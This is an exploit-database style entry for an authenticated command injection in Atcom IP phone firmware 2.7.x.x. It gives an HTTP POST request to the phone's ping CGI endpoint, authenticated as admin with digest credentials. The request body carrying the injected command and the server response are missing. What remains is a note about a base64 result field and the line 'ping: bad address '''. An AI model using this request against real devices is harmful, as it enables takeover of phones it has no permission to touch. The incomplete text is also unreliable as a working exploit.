Atcom 2.7.x.x Exploit, Authenticated Command Injection

# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage:
# Software Link:
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux

Exploit Request:

POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"




The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:

ping: bad address ''

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD